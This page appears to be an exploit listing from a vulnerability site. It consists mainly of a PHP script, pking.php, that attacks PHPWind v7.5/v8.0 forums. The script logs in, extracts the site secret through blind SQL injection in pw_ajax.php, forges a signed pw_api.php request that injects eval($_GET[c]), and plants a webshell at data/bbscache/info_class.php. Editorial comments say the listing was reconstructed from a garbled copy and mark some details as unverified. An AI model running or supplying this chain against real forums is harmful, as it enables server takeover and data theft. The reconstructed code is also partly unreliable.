PHPWind v7.5 / v8.0 vulnerability EXP — vulnerability warning — the black bar safety net

2011-03-06T00:00:00
ID MYHACK58:62201129637
Type myhack58
Reporter 佚名
Modified 2011-03-06T00:00:00

Description

PHPWind v7.5 / v8.0 vulnerability EXP. Keywords: phpwind7.5

Affected versions: PHPWind v7.5 / v8.0

Usage: php pking.php <user> <password> http://www.xxxx.com/ — a valid forum account is required (the script logs in first and aborts if the login fails), and the third argument is the forum's base URL.

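<?php
// pking.php -- PoC for the PHPWind v7.5 / v8.0 remote command execution chain
// described on this page. Only run against systems you are authorised to test.
//
// Usage: php pking.php <user> <password> <forum base URL>
//
// Chain, as implemented below:
//   1. log in as an ordinary forum user and collect the session cookies;
//   2. brute-force, one hex character at a time, the 32-character value of the
//      pw_config row db_siteownerid through an SQL injection in pw_ajax.php
//      (action=pcdelimg, parameter fieldname);
//   3. use that value as the signing secret for pw_api.php and send a crafted
//      serialized "params" value that carries a quote break and
//      eval($_GET[c]);
//   4. request the file the API writes, data/bbscache/info_class.php, to see
//      whether the injected code executes.
//
// This listing was reconstructed from a garbled copy of the original: spaces
// that the extraction inserted into numbers, variable names, URLs and the
// CURLOPT_HEADER constant were removed, and unbalanced quotes were repaired.
// Apart from the fixes called out in comments, payloads are as published.

echo "
Info: Poc for Phpwind remote command execution
Test: exploit.php user password http://www.xxxx.com/
";

// argv[0] is the script, so three user arguments mean argc == 4. The original
// tested argc < 3, which let the URL be omitted and left $pwurl undefined.
if ($argc < 4) {
    echo "\r\n parameter missing\r\n";
    die();
}

$user  = $argv[1];
$pass  = $argv[2];
$pwurl = $argv[3];

// Browser-looking request headers. Nothing below depends on them except the
// Content-Type, which the form-encoded POST bodies need.
$myheader = array(
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8',
    'Accept-Language: EN-us,EN;q=0.5',
    'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'Referer:http://www.tick.org/',
    'Connection: Keep-Alive',
    'Cache-Control: no-cache',
    'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)',
);

// Cookie jar shared with curlsend() via "global".
$cookie = "";

// Step 1: log in. The last argument (1) asks curlsend() to return the response
// headers so the Set-Cookie lines can be harvested. cktime=31536000 is the
// one-year "remember me" value; submit=%B5%C7%C2%BC is the GBK-encoded label of
// the login button. Credentials are URL-encoded so that '&', '%' or '+' in a
// password do not corrupt the form body (the original interpolated them raw).
$str = curlsend(
    "$pwurl/login.php?",
    "POST",
    0,
    $myheader,
    "forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0"
        . "&pwuser=" . urlencode($user)
        . "&pwpwd=" . urlencode($pass)
        . "&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC",
    1
);

// Collect every Set-Cookie name=value pair (attributes after ';' are dropped).
preg_match_all("/Set-Cookie:([^;]+)/is", $str, $array);
foreach ($array[1] as $pair) {
    $cookie .= ";" . $pair;
}

// An authenticated request to pw_ajax.php must not come back wrapped in the
// <ajax> error element; if it does, the login did not take.
$test = curlsend("$pwurl/pw_ajax.php", "POST", 0, $myheader, '', 1);
if (strpos($test, '<ajax>') !== false) {
    die('user password or other parameter error');
}

// Step 2: blind SQL injection. "fieldname" is concatenated into a SELECT, so the
// payload reads db_value from pw_config where db_name is
// 0x64625f736974656f776e65726964 ('db_siteownerid') and tests, via LIKE, whether
// db_value starts with the guessed prefix: {offset} is replaced by the hex of
// the prefix plus one candidate character and the trailing 25 is the '%'
// wildcard. "union select 0x612e2e" ('a..') followed by %23 ('#') closes the
// statement. A correct guess is detected by the response containing
// "pw_config" -- presumably the matching row changes the error path; the
// exact server-side reason is not visible from this script.
$shellcode = "action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23";

$hash   = "0123456789abcdef"; // candidate alphabet: one hex digit per position
$craked = "";

for ($i = 0; $i < 32; $i++) {          // the secret is 32 hex characters long
    for ($n = 0; $n < 16; $n++) {
        $tmp = str_replace("{offset}", bin2hex($craked . $hash[$n]), $shellcode);
        $tmp = curlsend("$pwurl/pw_ajax.php", "POST", 0, $myheader, $tmp, 0);
        if (strpos($tmp, "pw_config") !== false) {
            echo "CrackEd Offset " . ($i + 1) . " :" . $hash[$n] . "\r\n";
            $craked .= $hash[$n];
            break;
        }
    }
    // The original kept going after a position with no match, producing a
    // short secret and therefore a wrong signature; fail loudly instead.
    if (strlen($craked) !== $i + 1) {
        die("\r\nno character matched at offset " . ($i + 1) . " - injection failed\r\n");
    }
}

echo "Craked Magicdata :" . $craked . "\r\n";
echo "Get the shell :";

// Step 3 ("another 0day" in the original): pw_api.php accepts requests whose
// "sig" is md5(<sorted key=value& pairs> . <secret>), the secret being the
// value recovered above. "params" is a PHP-serialized nested array whose
// innermost string breaks out of a single-quoted literal and appends
// eval($_GET[c]); the threadscateGory method apparently writes this data to
// data/bbscache/info_class.php as PHP source (not verifiable from here).
// NOTE(review): the declared length s:21 does not match the 22-character
// literal that follows it (the space before "abc"); whether PHPWind's
// unserialize path tolerates that cannot be told from this listing.
// NOTE(review): the value is placed in the query string unencoded (spaces,
// quotes, braces); the signature is computed over the same raw text, so
// encoding it for transport would change what the server signs -- left as
// published.
$arg  = '';
$hack = array();
$hack['mode']   = 'Other';
$hack['method'] = 'threadscateGory';
$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\' abc";}}}';
$hack['type']   = 'app';
$hack = strips($hack);
ksort($hack);
reset($hack);
foreach ($hack as $key => $value) {
    if ($value && $key != 'sig') {
        $arg .= "$key=$value&";
    }
}
$arg .= 'sig=' . md5($arg . $craked);

echo file_get_contents("$pwurl/pw_api.php?" . $arg);
echo "OK\r\n";

// Step 4: call the planted shell with a probe command. The probe prints
// Just_wooyun, so that is the marker to look for; the original compared the
// response against 'tick', a string the probe never emits.
$str = file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");
if (strpos($str, 'Just_wooyun') !== false) {
    echo "Got shell :" . "$pwurl/data/bbscache/info_class.php?c=phpinfo();";
    echo "\r\nOver!";
} else {
    echo "\r\nshell not confirmed\r\n";
}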

/**
 * Recursively run stripslashes() over a value.
 *
 * Arrays are walked depth-first and every leaf is replaced by its
 * stripslashes() result; keys are kept as they are. Anything that is not an
 * array is passed straight to stripslashes(), so non-string scalars come back
 * as strings.
 *
 * @param mixed $param Scalar or (nested) array.
 * @return mixed Same shape as the input with backslash escapes removed.
 */
function strips($param) {
    if (!is_array($param)) {
        return stripslashes($param);
    }
    foreach ($param as $k => $leaf) {
        $param[$k] = strips($leaf);
    }
    return $param;
}

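/**
 * Send one HTTP request with cURL and return the raw response text.
 *
 * @param string       $url      Absolute URL to request.
 * @param string|false $method   Passed straight to CURLOPT_POST: any truthy value
 *                               (the callers pass "POST") makes it a POST, false a GET.
 * @param int          $ssl      Non-zero disables peer certificate verification.
 *                               PoC convenience only: it makes the TLS session
 *                               trivially interceptable, never use it outside a lab.
 *                               Every caller in this script passes 0.
 * @param array        $myheader Header lines for CURLOPT_HTTPHEADER.
 * @param string       $data     POST body. Only set when truthy, so '' (and the
 *                               string '0') send a POST without a body.
 * @param int          $header   Non-zero includes the response headers in the
 *                               returned text (CURLOPT_HEADER); the login step
 *                               needs this to read Set-Cookie.
 * @return string|false Response (headers + body when $header is set), or false
 *                      if curl_exec() failed.
 *
 * Reads the script-global $cookie (filled from the login response) and sends it
 * as CURLOPT_COOKIE on every request.
 */
function curlsend($url, $method = false, $ssl = 0, $myheader = array(), $data = '', $header = 0) {
    global $cookie;

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, $method);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $myheader);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // 0 = no connect timeout, as in the original; an unreachable host will hang
    // the script indefinitely.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
    curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    if ($data) {
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    // The garbled copy read "will be" here; $header is the CURLOPT_HEADER
    // toggle that the cookie harvesting in the login step depends on.
    curl_setopt($ch, CURLOPT_HEADER, $header);
    if ($ssl) {
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    }

    $response = curl_exec($ch);
    curl_close($ch);

    return $response;
}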

Result: a webshell at data/bbscache/info_class.php; the command is passed in the GET parameter `c` (for example `?c=phpinfo();`).